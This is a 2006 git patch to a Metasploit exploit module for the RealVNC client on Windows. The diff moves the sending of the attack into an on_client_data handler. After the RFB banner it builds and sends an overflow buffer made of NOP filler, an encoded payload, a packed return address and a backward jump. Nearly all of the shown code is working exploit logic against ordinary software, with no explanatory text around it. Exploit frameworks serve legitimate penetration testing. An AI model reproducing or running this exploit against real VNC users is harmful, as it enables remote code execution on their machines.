From cfdd264f2d794a4d77bbf1f6c19fb0f740fa40f5 Mon Sep 17 00:00:00 2001
From: Mario Ceballos <mc@metasploit.com>
Date: Thu, 14 Dec 2006 22:39:36 +0000
Subject: [PATCH] module clean up for realvnc_client.rb

git-svn-id: file:///home/svn/framework3/trunk@4203 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/vnc/realvnc_client.rb | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb
index d5ab68a95c..c117e5741a 100644
--- a/modules/exploits/windows/vnc/realvnc_client.rb
+++ b/modules/exploits/windows/vnc/realvnc_client.rb
@@ -47,19 +47,20 @@ class Exploits::Windows::Vnc::Realvnc_Client < Exploit::Remote
 	end
 
 	def on_client_connect(client)
-		return if ((p = regenerate_payload(client)) == nil)	
-
-		filler = make_nops(993 - payload.encoded.length)
 
 		rfb = "RFB 003.003\n"
 
+		client.put(rfb)
+	end
+
+	def on_client_data(client)
+		return if ((p = regenerate_payload(client)) == nil)
+
+		filler = make_nops(993 - payload.encoded.length)
+
 		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
 		sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
-		sploit << Rex::Text.rand_text_english(200)
-
-		client.put(rfb)
-
-		on_client_data(16)
+		sploit << rand_text_english(200)
 
 		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
 		client.put(sploit)